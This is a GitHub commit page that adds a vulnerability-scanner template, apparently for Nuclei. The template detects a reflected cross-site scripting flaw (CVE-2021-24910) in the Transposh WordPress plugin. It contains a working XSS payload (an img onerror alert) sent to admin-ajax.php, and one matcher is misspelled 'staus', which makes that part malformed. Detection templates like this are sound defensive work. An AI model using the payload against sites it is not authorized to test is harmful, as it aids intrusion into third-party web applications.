Added CVE-2021-24910.yaml
ScreaM
GitHub
parent
526730238f
commit
77303434c0
|
|
@ -0,0 +1,36 @@
|
||||||
|
id: CVE-2021-24910
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Transposh WordPress < 1.0.7 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: Screamy
|
||||||
|
severity: medium
|
||||||
|
description: The plugin's ajax action "tp_tp" is vulnerable to an unauthenticated reflected Cross-Site Scripting vulnerability when GET unsanitize "q" parameter is processed.
|
||||||
|
reference:
|
||||||
|
- https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/
|
||||||
|
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-24910.txt
|
||||||
|
- https://wpscan.com/vulnerability/b5cbebf4-5749-41a0-8be3-3333853fca17
|
||||||
|
tags: wordpress,wp-plugin,xss,Transposh,unauthenticated
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<img src=x onerror=alert(document.domain)>"
|
||||||
|
part: body
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
- type: staus
|
||||||
|
staus:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
Loading…
Reference in New Issue